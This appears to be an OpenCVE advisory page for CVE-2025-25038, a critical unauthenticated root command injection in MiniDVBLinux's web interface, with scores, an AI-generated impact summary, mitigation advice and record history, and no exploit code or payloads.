Description
An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device. Exploitation evidence was observed by the Shadowserver Foundation on 2024-04-10 UTC.
Published: 2025-06-20
Score: 9.3 Critical
EPSS: 5.3% Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An OS command injection flaw in MiniDVBLinux allows a remote, unauthenticated attacker to supply unsanitized input that is passed directly to the system shell. The flaw results in execution of arbitrary commands with root privileges, enabling full compromise of the device, including configuration changes, backdoor installation, or service disruption.

Affected Systems

MiniDVBLinux devices running version 5.4 or earlier are affected. The vulnerability resides in the publicly accessible web‑based management interface of all affected installations, regardless of network placement. No specific vendor folder other than MiniDVBLinux.

Risk and Exploitability

The flaw carries a CVSS score of 9.3 and an EPSS score of 5 %. Based on the description, it is inferred that an attacker can exploit the vulnerability from any network point that can reach the management interface without authentication. Because the vulnerability is already public and has been observed in the wild, the risk is significant, though the relatively low EPSS score indicates that exploitation may not be widespread. The issue is not listed in CISA’s KEV catalog.

Generated by OpenCVE AI on June 18, 2026 at 02:35 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the device firmware to a version newer than 5.4, or apply the vendor’s patch if available.
  • Restrict the web management interface to a trusted internal subnet or VPN, and block all external access unless necessary.
  • Enable logging and monitoring of shell command execution, and set up alerts for unexpected root activity.

Generated by OpenCVE AI on June 18, 2026 at 02:35 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-18780 An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device.
History

Mon, 22 Dec 2025 18:00:00 +0000

Type Values Removed Values Added
First Time appeared Minidvblinux
Minidvblinux minidvblinux
CPEs cpe:2.3:a:minidvblinux:minidvblinux:*:*:*:*:*:*:*:*
Vendors & Products Minidvblinux
Minidvblinux minidvblinux
Metrics cvssV3_1

{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}

Thu, 20 Nov 2025 17:30:00 +0000

Type Values Removed Values Added
Weaknesses CWE-20

Thu, 20 Nov 2025 16:30:00 +0000

Type Values Removed Values Added
Description An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device. An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device. Exploitation evidence was observed by the Shadowserver Foundation on 2024-04-10 UTC.

Mon, 23 Jun 2025 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 20 Jun 2025 19:00:00 +0000

Type Values Removed Values Added
Description An OS command injection vulnerability exists in MiniDVBLinux version 5.4 and earlier. The system’s web-based management interface fails to properly sanitize user-supplied input before passing it to operating system commands. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary commands as the root user, potentially compromising the entire device.
Title MiniDVBLinux Root Command Injection
Weaknesses CWE-20
CWE-78
References
Metrics cvssV4_0

{'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N'}

Subscriptions

Minidvblinux Minidvblinux
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-14T02:07:21.867Z

Reserved: 2025-01-31T18:32:36.214Z

Link: CVE-2025-25038

cve-icon Vulnrichment

Updated: 2025-06-23T20:34:25.969Z

cve-icon NVD

Status : Analyzed

Published: 2025-06-20T19:15:36.050

Modified: 2026-06-17T09:00:11.037

Link: CVE-2025-25038

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-18T02:45:16Z

Weaknesses
  • CWE-78

    Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')